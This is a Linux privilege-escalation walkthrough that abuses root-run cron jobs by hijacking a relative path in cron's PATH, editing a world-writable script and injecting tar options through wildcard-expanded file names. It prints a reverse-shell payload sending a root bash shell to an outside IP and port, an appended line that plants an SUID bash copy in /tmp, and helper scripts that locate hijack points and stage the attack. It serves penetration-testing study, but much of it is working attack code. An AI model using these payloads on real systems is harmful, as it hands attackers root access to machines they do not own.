Cron jobs are tasks that run on a schedule, often as root. They can be abused in a number of situations, such as a job invoking a script without an absolute path, weak permissions on the script being executed, or a script that hands a shell wildcard to a tool that accepts options from file names.
We can enumerate cron jobs by reading the system cron table (/etc/crontab, plus the drop-in files in /etc/cron.d/) and the per-user tables under /var/spool/cron/ or /var/spool/cron/crontabs/. Jobs in the system tables carry a user column saying who they run as; look for root there.
In this case we have two custom jobs: one running a file (overwrite.sh) without an absolute path and another running /usr/local/bin/compress.sh. Both run as root every minute.

No Absolute Path
Using locate to find overwrite.sh discovers the file in /usr/local/bin (locate reads a prebuilt database, so fall back to find / -name overwrite.sh 2>/dev/null if it returns nothing). That directory is also the third entry in the PATH cron uses for the job. Note that cron resolves a relative command against the PATH= line at the top of the crontab (or its built-in default), not against our login shell's PATH, so read that line from the crontab rather than echoing $PATH.

If we have write permission on a directory that appears earlier in that PATH, we can create a file with the same name there containing whatever we like, in this case a simple bash script that spawns a reverse shell. Don't forget to make the file executable (chmod +x).
#!/bin/bash
/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1

The cron job runs every minute, so start a listener (nc -lvnp <port>) and wait; within a minute cron resolves our copy of overwrite.sh first and we receive a shell as root.
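The enumeration and the PATH check above can be scripted. The following is an added example and not part of the original write-up: it parses a crontab-style file, reports jobs whose command is not invoked by absolute path, extracts the PATH cron will search, and lists the directories ahead of the real script's location that the current user can write to. The sample crontab it writes is constructed to mirror the two jobs described above; its PATH value is an assumption for the demo.

```bash
#!/bin/bash
# Added example (not from the original write-up): spot cron jobs that invoke
# commands by relative path and find a writable PATH directory to hijack them.

# Write a constructed /etc/crontab-style sample to "$1". The PATH line is an
# assumption for the demo; the two jobs mirror the ones in the write-up.
make_sample_crontab() {
    cat > "$1" <<'EOF'
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# m h dom mon dow user  command
*  *    * * *   root    overwrite.sh
*  *    * * *   root    /usr/local/bin/compress.sh
EOF
}

# Print each job whose command does not start with '/'. System crontabs
# (/etc/crontab, /etc/cron.d/*) have six leading fields (five time fields plus
# the user), so the user is printed too; per-user crontabs have five, so pass 5
# as the second argument there. @reboot-style lines are not handled.
cron_relative_commands() {
    local file="$1" n="${2:-6}"
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_]+=' "$file" |
        awk -v n="$n" '{ cmd = $(n + 1)
                         if (cmd !~ /^\//) { if (n == 6) print $6, cmd; else print cmd } }'
    return 0
}

# Extract the PATH cron uses for the jobs in a crontab. cron resolves relative
# commands against this value (or its built-in default), not our login shell's PATH.
cron_path() {
    sed -n 's/^[[:space:]]*PATH=//p' "$1" | head -n 1
    return 0
}

# Given a PATH string and the directory that really holds the script, print every
# directory searched before it that the current user can write to.
writable_dirs_before() {
    local path="$1" real_dir="$2" d
    local IFS=':'
    for d in $path; do
        [ "$d" = "$real_dir" ] && break
        [ -d "$d" ] && [ -w "$d" ] && echo "$d"
    done
    return 0
}

# Demo on the constructed sample. On a real target point these at /etc/crontab,
# /etc/cron.d/* and /var/spool/cron/crontabs/* instead.
tmp=$(mktemp -d)
make_sample_crontab "$tmp/crontab"
echo "relative commands: $(cron_relative_commands "$tmp/crontab")"
echo "cron PATH:         $(cron_path "$tmp/crontab")"
echo "writable dirs searched before /usr/local/bin:"
writable_dirs_before "$(cron_path "$tmp/crontab")" /usr/local/bin
rm -rf "$tmp"
```

Any directory printed by the last step is a hijack point: drop an executable named overwrite.sh there and cron will run it instead of the real one.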

Insecure Permissions
In this case the file /usr/local/bin/overwrite.sh is world-writable, meaning any user can edit its contents directly, even without write access to the directory it lives in.

We can abuse this in the same way as writing our own file; this time, though, I appended a line to copy /bin/bash into /tmp and set the SUID bit on the copy. Appending rather than replacing the script keeps the original job working, so nothing visibly breaks.

Once again, after a short wait the cronbash file appears in /tmp with the SUID bit set. Run it as /tmp/cronbash -p: without -p, bash drops its effective uid back to the real uid and you would not get root. With -p, running it grants a shell as root.
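The appended line and the check to make before relying on the result, as an added example rather than the write-up's own text. The paths are the ones the write-up uses; the helper names are mine.

```bash
#!/bin/bash
# Added example (not from the original write-up): the line appended to the
# world-writable cron script, and a check to run before trusting the result.

# Payload line to append to /usr/local/bin/overwrite.sh. cron runs the script as
# root, so the copy is root-owned and chmod +s sets the SUID bit on it.
payload_line() {
    echo 'cp /bin/bash /tmp/cronbash; chmod +s /tmp/cronbash'
}

# Append the payload to a writable script, leaving the original contents alone
# so the job keeps behaving normally. Fails if the script is not writable.
append_payload() {
    local script="$1"
    [ -w "$script" ] || { echo "not writable: $script" >&2; return 1; }
    payload_line >> "$script"
}

# Numeric uid of a file's owner (ls -n prints ids instead of names).
owner_uid() {
    ls -ldn "$1" | awk '{ print $3 }'
}

# Succeed only when the file exists, is owned by root (uid 0) and has the
# setuid bit set; test -u checks the setuid bit.
is_suid_root() {
    local f="$1"
    [ -f "$f" ] && [ -u "$f" ] && [ "$(owner_uid "$f")" = "0" ]
}

# Usage after the cron job has fired. bash drops its effective uid back to the
# real uid unless started with -p, so plain /tmp/cronbash would not give root.
if is_suid_root /tmp/cronbash; then
    echo "/tmp/cronbash is SUID root; run: /tmp/cronbash -p"
else
    echo "/tmp/cronbash is not SUID root yet (wait for the next minute)"
fi
```

If /tmp is mounted nosuid the kernel ignores the bit and the copy runs as you; pick another world-writable directory on a filesystem without that option.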

Wildcards
Taking a look at compress.sh, we have no write or execute permission; we can only read the file.
The script simply changes directory to /home/user and then uses tar to compress the contents of /home/user into /tmp/backup.tar.gz using a wildcard (tar czf /tmp/backup.tar.gz *).

Checking https://gtfobins.github.io/gtfobins/tar/ for shell escape methods using tar gives the following:
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
The shell expands the wildcard into a list of file names before tar runs, and GNU tar accepts options anywhere on its command line, so we can create files in /home/user named after the switches used in that command and tar will parse them as options.
I created a bash script named rshell.sh containing the payload below, gave it executable permissions, and created two empty files named --checkpoint=1 and --checkpoint-action=exec=rshell.sh (note the double hyphen at the start of each name). GNU tar hands the exec= command to sh -c, so the bare name rshell.sh is resolved through cron's PATH; if /home/user is not on that PATH, name the second file --checkpoint-action=exec=sh rshell.sh instead so the script is run from tar's working directory (a file name cannot contain a slash, so an absolute path is not available here).
#!/bin/bash
/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1


This will essentially run the following command when the cron job executes:
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=rshell.sh myvpn.ovpn rshell.sh tools
A short wait for the cron job to execute and we are once again granted a reverse shell as root.
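The whole wildcard injection can be reproduced locally as an unprivileged user to confirm the mechanism before waiting on the cron job. The following is an added example, not the write-up's own code: it builds a constructed stand-in for /home/user in a temporary directory, uses a marker file in place of the reverse shell, names the option file --checkpoint-action=exec=sh rshell.sh so it does not depend on cron's PATH, and runs tar the way the cron script does (with cf rather than czf so the demo needs no gzip).

```bash
#!/bin/bash
# Added example (not from the original write-up): reproduce the tar wildcard
# injection in a scratch directory as an unprivileged user. A marker file stands
# in for the reverse shell, and the directory layout is constructed.

# Build a constructed stand-in for /home/user under "$1": filler entries, the
# script we want root to run, and two files whose names are tar options.
setup_victim_dir() {
    local dir="$1" marker="$2"
    mkdir -p "$dir/tools"                      # constructed filler entry
    echo "client" > "$dir/myvpn.ovpn"          # constructed filler entry
    # Stand-in for rshell.sh; a real attack puts the reverse shell here.
    printf '#!/bin/bash\ntouch "%s"\n' "$marker" > "$dir/rshell.sh"
    chmod +x "$dir/rshell.sh"
    # File names tar will parse as options once the shell expands '*'. GNU tar
    # runs the exec= action through sh -c, so "sh rshell.sh" resolves against
    # tar's working directory and does not depend on cron's PATH.
    touch "$dir/--checkpoint=1"
    touch "$dir/--checkpoint-action=exec=sh rshell.sh"
}

# Print the argument list tar really receives after the shell expands '*'
# (each argument quoted, so the option-shaped file names stand out).
show_expansion() {
    ( cd "$1" || exit 1; printf 'tar cf backup.tar'; printf " '%s'" *; echo )
}

# What the cron script does: cd into the directory and archive it with '*'.
# Returns 0 when the injected command ran, i.e. the marker exists afterwards.
run_backup_and_check() {
    local dir="$1" marker="$2" archive="$3"
    rm -f "$marker"
    ( cd "$dir" && tar cf "$archive" * ) >/dev/null 2>&1
    [ -f "$marker" ]
}

# Demo: show the expansion, then run the backup and check the marker.
tmp=$(mktemp -d)
setup_victim_dir "$tmp/home" "$tmp/marker"
show_expansion "$tmp/home"
if run_backup_and_check "$tmp/home" "$tmp/marker" "$tmp/backup.tar"; then
    echo "injected command ran (marker created by rshell.sh)"
else
    echo "injected command did not run (not GNU tar, or checkpoints unsupported)"
fi
rm -rf "$tmp"
```

The same setup placed in /home/user, with the marker replaced by the reverse shell payload, is exactly what the cron job picks up on its next run.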
